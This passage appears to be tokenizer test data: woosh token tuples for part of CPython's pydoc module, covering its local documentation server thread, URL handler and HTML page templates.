woosh.Token(woosh.STRING, '"""Start the server."""', 2398, 12, 2398, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2398, 35, 2399, 0),
woosh.Token(woosh.NAME, 'try', 2399, 12, 2399, 15),
woosh.Token(woosh.OP, ':', 2399, 15, 2399, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 2399, 16, 2400, 0),
woosh.Token(woosh.INDENT, ' ', 2400, 0, 2400, 16),
woosh.Token(woosh.NAME, 'DocServer', 2400, 16, 2400, 25),
woosh.Token(woosh.OP, '.', 2400, 25, 2400, 26),
woosh.Token(woosh.NAME, 'base', 2400, 26, 2400, 30),
woosh.Token(woosh.OP, '=', 2400, 31, 2400, 32),
woosh.Token(woosh.NAME, 'http', 2400, 33, 2400, 37),
woosh.Token(woosh.OP, '.', 2400, 37, 2400, 38),
woosh.Token(woosh.NAME, 'server', 2400, 38, 2400, 44),
woosh.Token(woosh.OP, '.', 2400, 44, 2400, 45),
woosh.Token(woosh.NAME, 'HTTPServer', 2400, 45, 2400, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 2400, 55, 2401, 0),
woosh.Token(woosh.NAME, 'DocServer', 2401, 16, 2401, 25),
woosh.Token(woosh.OP, '.', 2401, 25, 2401, 26),
woosh.Token(woosh.NAME, 'handler', 2401, 26, 2401, 33),
woosh.Token(woosh.OP, '=', 2401, 34, 2401, 35),
woosh.Token(woosh.NAME, 'DocHandler', 2401, 36, 2401, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 2401, 46, 2402, 0),
woosh.Token(woosh.NAME, 'DocHandler', 2402, 16, 2402, 26),
woosh.Token(woosh.OP, '.', 2402, 26, 2402, 27),
woosh.Token(woosh.NAME, 'MessageClass', 2402, 27, 2402, 39),
woosh.Token(woosh.OP, '=', 2402, 40, 2402, 41),
woosh.Token(woosh.NAME, 'email', 2402, 42, 2402, 47),
woosh.Token(woosh.OP, '.', 2402, 47, 2402, 48),
woosh.Token(woosh.NAME, 'message', 2402, 48, 2402, 55),
woosh.Token(woosh.OP, '.', 2402, 55, 2402, 56),
woosh.Token(woosh.NAME, 'Message', 2402, 56, 2402, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 2402, 63, 2403, 0),
woosh.Token(woosh.NAME, 'DocHandler', 2403, 16, 2403, 26),
woosh.Token(woosh.OP, '.', 2403, 26, 2403, 27),
woosh.Token(woosh.NAME, 'urlhandler', 2403, 27, 2403, 37),
woosh.Token(woosh.OP, '=', 2403, 38, 2403, 39),
woosh.Token(woosh.NAME, 'staticmethod', 2403, 40, 2403, 52),
woosh.Token(woosh.OP, '(', 2403, 52, 2403, 53),
woosh.Token(woosh.NAME, 'self', 2403, 53, 2403, 57),
woosh.Token(woosh.OP, '.', 2403, 57, 2403, 58),
woosh.Token(woosh.NAME, 'urlhandler', 2403, 58, 2403, 68),
woosh.Token(woosh.OP, ')', 2403, 68, 2403, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 2403, 69, 2404, 0),
woosh.Token(woosh.NAME, 'docsvr', 2404, 16, 2404, 22),
woosh.Token(woosh.OP, '=', 2404, 23, 2404, 24),
woosh.Token(woosh.NAME, 'DocServer', 2404, 25, 2404, 34),
woosh.Token(woosh.OP, '(', 2404, 34, 2404, 35),
woosh.Token(woosh.NAME, 'self', 2404, 35, 2404, 39),
woosh.Token(woosh.OP, '.', 2404, 39, 2404, 40),
woosh.Token(woosh.NAME, 'host', 2404, 40, 2404, 44),
woosh.Token(woosh.OP, ',', 2404, 44, 2404, 45),
woosh.Token(woosh.NAME, 'self', 2404, 46, 2404, 50),
woosh.Token(woosh.OP, '.', 2404, 50, 2404, 51),
woosh.Token(woosh.NAME, 'port', 2404, 51, 2404, 55),
woosh.Token(woosh.OP, ',', 2404, 55, 2404, 56),
woosh.Token(woosh.NAME, 'self', 2404, 57, 2404, 61),
woosh.Token(woosh.OP, '.', 2404, 61, 2404, 62),
woosh.Token(woosh.NAME, 'ready', 2404, 62, 2404, 67),
woosh.Token(woosh.OP, ')', 2404, 67, 2404, 68),
woosh.Token(woosh.NEWLINE, '\r\n', 2404, 68, 2405, 0),
woosh.Token(woosh.NAME, 'self', 2405, 16, 2405, 20),
woosh.Token(woosh.OP, '.', 2405, 20, 2405, 21),
woosh.Token(woosh.NAME, 'docserver', 2405, 21, 2405, 30),
woosh.Token(woosh.OP, '=', 2405, 31, 2405, 32),
woosh.Token(woosh.NAME, 'docsvr', 2405, 33, 2405, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2405, 39, 2406, 0),
woosh.Token(woosh.NAME, 'docsvr', 2406, 16, 2406, 22),
woosh.Token(woosh.OP, '.', 2406, 22, 2406, 23),
woosh.Token(woosh.NAME, 'serve_until_quit', 2406, 23, 2406, 39),
woosh.Token(woosh.OP, '(', 2406, 39, 2406, 40),
woosh.Token(woosh.OP, ')', 2406, 40, 2406, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2406, 41, 2407, 0),
woosh.Token(woosh.DEDENT, ' ', 2407, 0, 2407, 12),
woosh.Token(woosh.NAME, 'except', 2407, 12, 2407, 18),
woosh.Token(woosh.NAME, 'Exception', 2407, 19, 2407, 28),
woosh.Token(woosh.NAME, 'as', 2407, 29, 2407, 31),
woosh.Token(woosh.NAME, 'e', 2407, 32, 2407, 33),
woosh.Token(woosh.OP, ':', 2407, 33, 2407, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 2407, 34, 2408, 0),
woosh.Token(woosh.INDENT, ' ', 2408, 0, 2408, 16),
woosh.Token(woosh.NAME, 'self', 2408, 16, 2408, 20),
woosh.Token(woosh.OP, '.', 2408, 20, 2408, 21),
woosh.Token(woosh.NAME, 'error', 2408, 21, 2408, 26),
woosh.Token(woosh.OP, '=', 2408, 27, 2408, 28),
woosh.Token(woosh.NAME, 'e', 2408, 29, 2408, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 2408, 30, 2409, 0),
woosh.Token(woosh.DEDENT, ' ', 2410, 0, 2410, 8),
woosh.Token(woosh.DEDENT, '', 2410, 8, 2410, 8),
woosh.Token(woosh.NAME, 'def', 2410, 8, 2410, 11),
woosh.Token(woosh.NAME, 'ready', 2410, 12, 2410, 17),
woosh.Token(woosh.OP, '(', 2410, 17, 2410, 18),
woosh.Token(woosh.NAME, 'self', 2410, 18, 2410, 22),
woosh.Token(woosh.OP, ',', 2410, 22, 2410, 23),
woosh.Token(woosh.NAME, 'server', 2410, 24, 2410, 30),
woosh.Token(woosh.OP, ')', 2410, 30, 2410, 31),
woosh.Token(woosh.OP, ':', 2410, 31, 2410, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2410, 32, 2411, 0),
woosh.Token(woosh.INDENT, ' ', 2411, 0, 2411, 12),
woosh.Token(woosh.NAME, 'self', 2411, 12, 2411, 16),
woosh.Token(woosh.OP, '.', 2411, 16, 2411, 17),
woosh.Token(woosh.NAME, 'serving', 2411, 17, 2411, 24),
woosh.Token(woosh.OP, '=', 2411, 25, 2411, 26),
woosh.Token(woosh.NAME, 'True', 2411, 27, 2411, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 2411, 31, 2412, 0),
woosh.Token(woosh.NAME, 'self', 2412, 12, 2412, 16),
woosh.Token(woosh.OP, '.', 2412, 16, 2412, 17),
woosh.Token(woosh.NAME, 'host', 2412, 17, 2412, 21),
woosh.Token(woosh.OP, '=', 2412, 22, 2412, 23),
woosh.Token(woosh.NAME, 'server', 2412, 24, 2412, 30),
woosh.Token(woosh.OP, '.', 2412, 30, 2412, 31),
woosh.Token(woosh.NAME, 'host', 2412, 31, 2412, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2412, 35, 2413, 0),
woosh.Token(woosh.NAME, 'self', 2413, 12, 2413, 16),
woosh.Token(woosh.OP, '.', 2413, 16, 2413, 17),
woosh.Token(woosh.NAME, 'port', 2413, 17, 2413, 21),
woosh.Token(woosh.OP, '=', 2413, 22, 2413, 23),
woosh.Token(woosh.NAME, 'server', 2413, 24, 2413, 30),
woosh.Token(woosh.OP, '.', 2413, 30, 2413, 31),
woosh.Token(woosh.NAME, 'server_port', 2413, 31, 2413, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 2413, 42, 2414, 0),
woosh.Token(woosh.NAME, 'self', 2414, 12, 2414, 16),
woosh.Token(woosh.OP, '.', 2414, 16, 2414, 17),
woosh.Token(woosh.NAME, 'url', 2414, 17, 2414, 20),
woosh.Token(woosh.OP, '=', 2414, 21, 2414, 22),
woosh.Token(woosh.STRING, "'http://%s:%d/'", 2414, 23, 2414, 38),
woosh.Token(woosh.OP, '%', 2414, 39, 2414, 40),
woosh.Token(woosh.OP, '(', 2414, 41, 2414, 42),
woosh.Token(woosh.NAME, 'self', 2414, 42, 2414, 46),
woosh.Token(woosh.OP, '.', 2414, 46, 2414, 47),
woosh.Token(woosh.NAME, 'host', 2414, 47, 2414, 51),
woosh.Token(woosh.OP, ',', 2414, 51, 2414, 52),
woosh.Token(woosh.NAME, 'self', 2414, 53, 2414, 57),
woosh.Token(woosh.OP, '.', 2414, 57, 2414, 58),
woosh.Token(woosh.NAME, 'port', 2414, 58, 2414, 62),
woosh.Token(woosh.OP, ')', 2414, 62, 2414, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 2414, 63, 2415, 0),
woosh.Token(woosh.DEDENT, ' ', 2416, 0, 2416, 8),
woosh.Token(woosh.NAME, 'def', 2416, 8, 2416, 11),
woosh.Token(woosh.NAME, 'stop', 2416, 12, 2416, 16),
woosh.Token(woosh.OP, '(', 2416, 16, 2416, 17),
woosh.Token(woosh.NAME, 'self', 2416, 17, 2416, 21),
woosh.Token(woosh.OP, ')', 2416, 21, 2416, 22),
woosh.Token(woosh.OP, ':', 2416, 22, 2416, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 2416, 23, 2417, 0),
woosh.Token(woosh.INDENT, ' ', 2417, 0, 2417, 12),
woosh.Token(woosh.STRING, '"""Stop the server and this thread nicely"""', 2417, 12, 2417, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 2417, 56, 2418, 0),
woosh.Token(woosh.NAME, 'self', 2418, 12, 2418, 16),
woosh.Token(woosh.OP, '.', 2418, 16, 2418, 17),
woosh.Token(woosh.NAME, 'docserver', 2418, 17, 2418, 26),
woosh.Token(woosh.OP, '.', 2418, 26, 2418, 27),
woosh.Token(woosh.NAME, 'quit', 2418, 27, 2418, 31),
woosh.Token(woosh.OP, '=', 2418, 32, 2418, 33),
woosh.Token(woosh.NAME, 'True', 2418, 34, 2418, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2418, 38, 2419, 0),
woosh.Token(woosh.NAME, 'self', 2419, 12, 2419, 16),
woosh.Token(woosh.OP, '.', 2419, 16, 2419, 17),
woosh.Token(woosh.NAME, 'join', 2419, 17, 2419, 21),
woosh.Token(woosh.OP, '(', 2419, 21, 2419, 22),
woosh.Token(woosh.OP, ')', 2419, 22, 2419, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 2419, 23, 2420, 0),
woosh.Token(woosh.COMMENT, '# explicitly break a reference cycle: DocServer.callback', 2420, 12, 2420, 68),
woosh.Token(woosh.COMMENT, '# has indirectly a reference to ServerThread.', 2421, 12, 2421, 57),
woosh.Token(woosh.NAME, 'self', 2422, 12, 2422, 16),
woosh.Token(woosh.OP, '.', 2422, 16, 2422, 17),
woosh.Token(woosh.NAME, 'docserver', 2422, 17, 2422, 26),
woosh.Token(woosh.OP, '=', 2422, 27, 2422, 28),
woosh.Token(woosh.NAME, 'None', 2422, 29, 2422, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2422, 33, 2423, 0),
woosh.Token(woosh.NAME, 'self', 2423, 12, 2423, 16),
woosh.Token(woosh.OP, '.', 2423, 16, 2423, 17),
woosh.Token(woosh.NAME, 'serving', 2423, 17, 2423, 24),
woosh.Token(woosh.OP, '=', 2423, 25, 2423, 26),
woosh.Token(woosh.NAME, 'False', 2423, 27, 2423, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2423, 32, 2424, 0),
woosh.Token(woosh.NAME, 'self', 2424, 12, 2424, 16),
woosh.Token(woosh.OP, '.', 2424, 16, 2424, 17),
woosh.Token(woosh.NAME, 'url', 2424, 17, 2424, 20),
woosh.Token(woosh.OP, '=', 2424, 21, 2424, 22),
woosh.Token(woosh.NAME, 'None', 2424, 23, 2424, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2424, 27, 2425, 0),
woosh.Token(woosh.DEDENT, ' ', 2426, 0, 2426, 4),
woosh.Token(woosh.DEDENT, '', 2426, 4, 2426, 4),
woosh.Token(woosh.NAME, 'thread', 2426, 4, 2426, 10),
woosh.Token(woosh.OP, '=', 2426, 11, 2426, 12),
woosh.Token(woosh.NAME, 'ServerThread', 2426, 13, 2426, 25),
woosh.Token(woosh.OP, '(', 2426, 25, 2426, 26),
woosh.Token(woosh.NAME, 'urlhandler', 2426, 26, 2426, 36),
woosh.Token(woosh.OP, ',', 2426, 36, 2426, 37),
woosh.Token(woosh.NAME, 'hostname', 2426, 38, 2426, 46),
woosh.Token(woosh.OP, ',', 2426, 46, 2426, 47),
woosh.Token(woosh.NAME, 'port', 2426, 48, 2426, 52),
woosh.Token(woosh.OP, ')', 2426, 52, 2426, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2426, 53, 2427, 0),
woosh.Token(woosh.NAME, 'thread', 2427, 4, 2427, 10),
woosh.Token(woosh.OP, '.', 2427, 10, 2427, 11),
woosh.Token(woosh.NAME, 'start', 2427, 11, 2427, 16),
woosh.Token(woosh.OP, '(', 2427, 16, 2427, 17),
woosh.Token(woosh.OP, ')', 2427, 17, 2427, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 2427, 18, 2428, 0),
woosh.Token(woosh.COMMENT, '# Wait until thread.serving is True to make sure we are', 2428, 4, 2428, 59),
woosh.Token(woosh.COMMENT, '# really up before returning.', 2429, 4, 2429, 33),
woosh.Token(woosh.NAME, 'while', 2430, 4, 2430, 9),
woosh.Token(woosh.NAME, 'not', 2430, 10, 2430, 13),
woosh.Token(woosh.NAME, 'thread', 2430, 14, 2430, 20),
woosh.Token(woosh.OP, '.', 2430, 20, 2430, 21),
woosh.Token(woosh.NAME, 'error', 2430, 21, 2430, 26),
woosh.Token(woosh.NAME, 'and', 2430, 27, 2430, 30),
woosh.Token(woosh.NAME, 'not', 2430, 31, 2430, 34),
woosh.Token(woosh.NAME, 'thread', 2430, 35, 2430, 41),
woosh.Token(woosh.OP, '.', 2430, 41, 2430, 42),
woosh.Token(woosh.NAME, 'serving', 2430, 42, 2430, 49),
woosh.Token(woosh.OP, ':', 2430, 49, 2430, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 2430, 50, 2431, 0),
woosh.Token(woosh.INDENT, ' ', 2431, 0, 2431, 8),
woosh.Token(woosh.NAME, 'time', 2431, 8, 2431, 12),
woosh.Token(woosh.OP, '.', 2431, 12, 2431, 13),
woosh.Token(woosh.NAME, 'sleep', 2431, 13, 2431, 18),
woosh.Token(woosh.OP, '(', 2431, 18, 2431, 19),
woosh.Token(woosh.NUMBER, '.01', 2431, 19, 2431, 22),
woosh.Token(woosh.OP, ')', 2431, 22, 2431, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 2431, 23, 2432, 0),
woosh.Token(woosh.DEDENT, ' ', 2432, 0, 2432, 4),
woosh.Token(woosh.NAME, 'return', 2432, 4, 2432, 10),
woosh.Token(woosh.NAME, 'thread', 2432, 11, 2432, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2432, 17, 2433, 0),
woosh.Token(woosh.DEDENT, '', 2435, 0, 2435, 0),
woosh.Token(woosh.NAME, 'def', 2435, 0, 2435, 3),
woosh.Token(woosh.NAME, '_url_handler', 2435, 4, 2435, 16),
woosh.Token(woosh.OP, '(', 2435, 16, 2435, 17),
woosh.Token(woosh.NAME, 'url', 2435, 17, 2435, 20),
woosh.Token(woosh.OP, ',', 2435, 20, 2435, 21),
woosh.Token(woosh.NAME, 'content_type', 2435, 22, 2435, 34),
woosh.Token(woosh.OP, '=', 2435, 34, 2435, 35),
woosh.Token(woosh.STRING, '"text/html"', 2435, 35, 2435, 46),
woosh.Token(woosh.OP, ')', 2435, 46, 2435, 47),
woosh.Token(woosh.OP, ':', 2435, 47, 2435, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 2435, 48, 2436, 0),
woosh.Token(woosh.INDENT, ' ', 2436, 0, 2436, 4),
woosh.Token(woosh.STRING, '"""The pydoc url handler for use with the pydoc server.\r\n\r\n If the content_type is \'text/css\', the _pydoc.css style\r\n sheet is read and returned if it exits.\r\n\r\n If the content_type is \'text/html\', then the result of\r\n get_html_page(url) is returned.\r\n """', 2436, 4, 2443, 7),
woosh.Token(woosh.NEWLINE, '\r\n', 2443, 7, 2444, 0),
woosh.Token(woosh.NAME, 'class', 2444, 4, 2444, 9),
woosh.Token(woosh.NAME, '_HTMLDoc', 2444, 10, 2444, 18),
woosh.Token(woosh.OP, '(', 2444, 18, 2444, 19),
woosh.Token(woosh.NAME, 'HTMLDoc', 2444, 19, 2444, 26),
woosh.Token(woosh.OP, ')', 2444, 26, 2444, 27),
woosh.Token(woosh.OP, ':', 2444, 27, 2444, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2444, 28, 2445, 0),
woosh.Token(woosh.INDENT, ' ', 2446, 0, 2446, 8),
woosh.Token(woosh.NAME, 'def', 2446, 8, 2446, 11),
woosh.Token(woosh.NAME, 'page', 2446, 12, 2446, 16),
woosh.Token(woosh.OP, '(', 2446, 16, 2446, 17),
woosh.Token(woosh.NAME, 'self', 2446, 17, 2446, 21),
woosh.Token(woosh.OP, ',', 2446, 21, 2446, 22),
woosh.Token(woosh.NAME, 'title', 2446, 23, 2446, 28),
woosh.Token(woosh.OP, ',', 2446, 28, 2446, 29),
woosh.Token(woosh.NAME, 'contents', 2446, 30, 2446, 38),
woosh.Token(woosh.OP, ')', 2446, 38, 2446, 39),
woosh.Token(woosh.OP, ':', 2446, 39, 2446, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 2446, 40, 2447, 0),
woosh.Token(woosh.INDENT, ' ', 2447, 0, 2447, 12),
woosh.Token(woosh.STRING, '"""Format an HTML page."""', 2447, 12, 2447, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2447, 38, 2448, 0),
woosh.Token(woosh.NAME, 'css_path', 2448, 12, 2448, 20),
woosh.Token(woosh.OP, '=', 2448, 21, 2448, 22),
woosh.Token(woosh.STRING, '"pydoc_data/_pydoc.css"', 2448, 23, 2448, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 2448, 46, 2449, 0),
woosh.Token(woosh.NAME, 'css_link', 2449, 12, 2449, 20),
woosh.Token(woosh.OP, '=', 2449, 21, 2449, 22),
woosh.Token(woosh.OP, '(', 2449, 23, 2449, 24),
woosh.Token(woosh.STRING, '\'<link rel="stylesheet" type="text/css" href="%s">\'', 2450, 16, 2450, 67),
woosh.Token(woosh.OP, '%', 2450, 68, 2450, 69),
woosh.Token(woosh.NAME, 'css_path', 2451, 16, 2451, 24),
woosh.Token(woosh.OP, ')', 2451, 24, 2451, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2451, 25, 2452, 0),
woosh.Token(woosh.NAME, 'return', 2452, 12, 2452, 18),
woosh.Token(woosh.STRING, '\'\'\'\\\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">\r\n<html><head><title>Pydoc: %s</title>\r\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8">\r\n%s</head><body bgcolor="#f0f0f8">%s<div style="clear:both;padding-top:.5em;">%s</div>\r\n</body></html>\'\'\'', 2452, 19, 2457, 17),
woosh.Token(woosh.OP, '%', 2457, 18, 2457, 19),
woosh.Token(woosh.OP, '(', 2457, 20, 2457, 21),
woosh.Token(woosh.NAME, 'title', 2457, 21, 2457, 26),
woosh.Token(woosh.OP, ',', 2457, 26, 2457, 27),
woosh.Token(woosh.NAME, 'css_link', 2457, 28, 2457, 36),
woosh.Token(woosh.OP, ',', 2457, 36, 2457, 37),
woosh.Token(woosh.NAME, 'html_navbar', 2457, 38, 2457, 49),
woosh.Token(woosh.OP, '(', 2457, 49, 2457, 50),
woosh.Token(woosh.OP, ')', 2457, 50, 2457, 51),
woosh.Token(woosh.OP, ',', 2457, 51, 2457, 52),
woosh.Token(woosh.NAME, 'contents', 2457, 53, 2457, 61),
woosh.Token(woosh.OP, ')', 2457, 61, 2457, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 2457, 62, 2458, 0),
woosh.Token(woosh.DEDENT, ' ', 2459, 0, 2459, 8),
woosh.Token(woosh.NAME, 'def', 2459, 8, 2459, 11),
woosh.Token(woosh.NAME, 'filelink', 2459, 12, 2459, 20),
woosh.Token(woosh.OP, '(', 2459, 20, 2459, 21),
woosh.Token(woosh.NAME, 'self', 2459, 21, 2459, 25),
woosh.Token(woosh.OP, ',', 2459, 25, 2459, 26),
woosh.Token(woosh.NAME, 'url', 2459, 27, 2459, 30),
woosh.Token(woosh.OP, ',', 2459, 30, 2459, 31),
woosh.Token(woosh.NAME, 'path', 2459, 32, 2459, 36),
woosh.Token(woosh.OP, ')', 2459, 36, 2459, 37),
woosh.Token(woosh.OP, ':', 2459, 37, 2459, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2459, 38, 2460, 0),
woosh.Token(woosh.INDENT, ' ', 2460, 0, 2460, 12),
woosh.Token(woosh.NAME, 'return', 2460, 12, 2460, 18),
woosh.Token(woosh.STRING, '\'<a href="getfile?key=%s">%s</a>\'', 2460, 19, 2460, 52),
woosh.Token(woosh.OP, '%', 2460, 53, 2460, 54),
woosh.Token(woosh.OP, '(', 2460, 55, 2460, 56),
woosh.Token(woosh.NAME, 'url', 2460, 56, 2460, 59),
woosh.Token(woosh.OP, ',', 2460, 59, 2460, 60),
woosh.Token(woosh.NAME, 'path', 2460, 61, 2460, 65),
woosh.Token(woosh.OP, ')', 2460, 65, 2460, 66),
woosh.Token(woosh.NEWLINE, '\r\n', 2460, 66, 2461, 0),
woosh.Token(woosh.DEDENT, ' ', 2463, 0, 2463, 4),
woosh.Token(woosh.DEDENT, '', 2463, 4, 2463, 4),
woosh.Token(woosh.NAME, 'html', 2463, 4, 2463, 8),
woosh.Token(woosh.OP, '=', 2463, 9, 2463, 10),
woosh.Token(woosh.NAME, '_HTMLDoc', 2463, 11, 2463, 19),
woosh.Token(woosh.OP, '(', 2463, 19, 2463, 20),
woosh.Token(woosh.OP, ')', 2463, 20, 2463, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2463, 21, 2464, 0),
woosh.Token(woosh.NAME, 'def', 2465, 4, 2465, 7),
woosh.Token(woosh.NAME, 'html_navbar', 2465, 8, 2465, 19),
woosh.Token(woosh.OP, '(', 2465, 19, 2465, 20),
woosh.Token(woosh.OP, ')', 2465, 20, 2465, 21),
woosh.Token(woosh.OP, ':', 2465, 21, 2465, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 2465, 22, 2466, 0),
woosh.Token(woosh.INDENT, ' ', 2466, 0, 2466, 8),
woosh.Token(woosh.NAME, 'version', 2466, 8, 2466, 15),
woosh.Token(woosh.OP, '=', 2466, 16, 2466, 17),
woosh.Token(woosh.NAME, 'html', 2466, 18, 2466, 22),
woosh.Token(woosh.OP, '.', 2466, 22, 2466, 23),
woosh.Token(woosh.NAME, 'escape', 2466, 23, 2466, 29),
woosh.Token(woosh.OP, '(', 2466, 29, 2466, 30),
woosh.Token(woosh.STRING, '"%s [%s, %s]"', 2466, 30, 2466, 43),
woosh.Token(woosh.OP, '%', 2466, 44, 2466, 45),
woosh.Token(woosh.OP, '(', 2466, 46, 2466, 47),
woosh.Token(woosh.NAME, 'platform', 2466, 47, 2466, 55),
woosh.Token(woosh.OP, '.', 2466, 55, 2466, 56),
woosh.Token(woosh.NAME, 'python_version', 2466, 56, 2466, 70),
woosh.Token(woosh.OP, '(', 2466, 70, 2466, 71),
woosh.Token(woosh.OP, ')', 2466, 71, 2466, 72),
woosh.Token(woosh.OP, ',', 2466, 72, 2466, 73),
woosh.Token(woosh.NAME, 'platform', 2467, 47, 2467, 55),
woosh.Token(woosh.OP, '.', 2467, 55, 2467, 56),
woosh.Token(woosh.NAME, 'python_build', 2467, 56, 2467, 68),
woosh.Token(woosh.OP, '(', 2467, 68, 2467, 69),
woosh.Token(woosh.OP, ')', 2467, 69, 2467, 70),
woosh.Token(woosh.OP, '[', 2467, 70, 2467, 71),
woosh.Token(woosh.NUMBER, '0', 2467, 71, 2467, 72),
woosh.Token(woosh.OP, ']', 2467, 72, 2467, 73),
woosh.Token(woosh.OP, ',', 2467, 73, 2467, 74),
woosh.Token(woosh.NAME, 'platform', 2468, 47, 2468, 55),
woosh.Token(woosh.OP, '.', 2468, 55, 2468, 56),
woosh.Token(woosh.NAME, 'python_compiler', 2468, 56, 2468, 71),
woosh.Token(woosh.OP, '(', 2468, 71, 2468, 72),
woosh.Token(woosh.OP, ')', 2468, 72, 2468, 73),
woosh.Token(woosh.OP, ')', 2468, 73, 2468, 74),
woosh.Token(woosh.OP, ')', 2468, 74, 2468, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 2468, 75, 2469, 0),
woosh.Token(woosh.NAME, 'return', 2469, 8, 2469, 14),
woosh.Token(woosh.STRING, '"""\r\n <div style=\'float:left\'>\r\n Python %s<br>%s\r\n </div>\r\n <div style=\'float:right\'>\r\n <div style=\'text-align:center\'>\r\n <a href="index.html">Module Index</a>\r\n : <a href="topics.html">Topics</a>\r\n : <a href="keywords.html">Keywords</a>\r\n </div>\r\n <div>\r\n <form action="get" style=\'display:inline;\'>\r\n <input type=text name=key size=15>\r\n <input type=submit value="Get">\r\n </form> \r\n <form action="search" style=\'display:inline;\'>\r\n <input type=text name=key size=15>\r\n <input type=submit value="Search">\r\n </form>\r\n </div>\r\n </div>\r\n """', 2469, 15, 2490, 15),
woosh.Token(woosh.OP, '%', 2490, 16, 2490, 17),
woosh.Token(woosh.OP, '(', 2490, 18, 2490, 19),
woosh.Token(woosh.NAME, 'version', 2490, 19, 2490, 26),
woosh.Token(woosh.OP, ',', 2490, 26, 2490, 27),
woosh.Token(woosh.NAME, 'html', 2490, 28, 2490, 32),
woosh.Token(woosh.OP, '.', 2490, 32, 2490, 33),
woosh.Token(woosh.NAME, 'escape', 2490, 33, 2490, 39),
woosh.Token(woosh.OP, '(', 2490, 39, 2490, 40),
woosh.Token(woosh.NAME, 'platform', 2490, 40, 2490, 48),
woosh.Token(woosh.OP, '.', 2490, 48, 2490, 49),
woosh.Token(woosh.NAME, 'platform', 2490, 49, 2490, 57),
woosh.Token(woosh.OP, '(', 2490, 57, 2490, 58),
woosh.Token(woosh.NAME, 'terse', 2490, 58, 2490, 63),
woosh.Token(woosh.OP, '=', 2490, 63, 2490, 64),
woosh.Token(woosh.NAME, 'True', 2490, 64, 2490, 68),
woosh.Token(woosh.OP, ')', 2490, 68, 2490, 69),
woosh.Token(woosh.OP, ')', 2490, 69, 2490, 70),
woosh.Token(woosh.OP, ')', 2490, 70, 2490, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 2490, 71, 2491, 0),
woosh.Token(woosh.DEDENT, ' ', 2492, 0, 2492, 4),
woosh.Token(woosh.NAME, 'def', 2492, 4, 2492, 7),
woosh.Token(woosh.NAME, 'html_index', 2492, 8, 2492, 18),
woosh.Token(woosh.OP, '(', 2492, 18, 2492, 19),
woosh.Token(woosh.OP, ')', 2492, 19, 2492, 20),
woosh.Token(woosh.OP, ':', 2492, 20, 2492, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2492, 21, 2493, 0),
woosh.Token(woosh.INDENT, ' ', 2493, 0, 2493, 8),
woosh.Token(woosh.STRING, '"""Module Index page."""', 2493, 8, 2493, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2493, 32, 2494, 0),
woosh.Token(woosh.NAME, 'def', 2495, 8, 2495, 11),
woosh.Token(woosh.NAME, 'bltinlink', 2495, 12, 2495, 21),
woosh.Token(woosh.OP, '(', 2495, 21, 2495, 22),
woosh.Token(woosh.NAME, 'name', 2495, 22, 2495, 26),
woosh.Token(woosh.OP, ')', 2495, 26, 2495, 27),
woosh.Token(woosh.OP, ':', 2495, 27, 2495, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2495, 28, 2496, 0),
woosh.Token(woosh.INDENT, ' ', 2496, 0, 2496, 12),
woosh.Token(woosh.NAME, 'return', 2496, 12, 2496, 18),
woosh.Token(woosh.STRING, '\'<a href="%s.html">%s</a>\'', 2496, 19, 2496, 45),
woosh.Token(woosh.OP, '%', 2496, 46, 2496, 47),
woosh.Token(woosh.OP, '(', 2496, 48, 2496, 49),
woosh.Token(woosh.NAME, 'name', 2496, 49, 2496, 53),
woosh.Token(woosh.OP, ',', 2496, 53, 2496, 54),
woosh.Token(woosh.NAME, 'name', 2496, 55, 2496, 59),
woosh.Token(woosh.OP, ')', 2496, 59, 2496, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 2496, 60, 2497, 0),
woosh.Token(woosh.DEDENT, ' ', 2498, 0, 2498, 8),
woosh.Token(woosh.NAME, 'heading', 2498, 8, 2498, 15),
woosh.Token(woosh.OP, '=', 2498, 16, 2498, 17),
woosh.Token(woosh.NAME, 'html', 2498, 18, 2498, 22),
woosh.Token(woosh.OP, '.', 2498, 22, 2498, 23),
woosh.Token(woosh.NAME, 'heading', 2498, 23, 2498, 30),
woosh.Token(woosh.OP, '(', 2498, 30, 2498, 31),
woosh.Token(woosh.STRING, "'<big><big><strong>Index of Modules</strong></big></big>'", 2499, 12, 2499, 69),
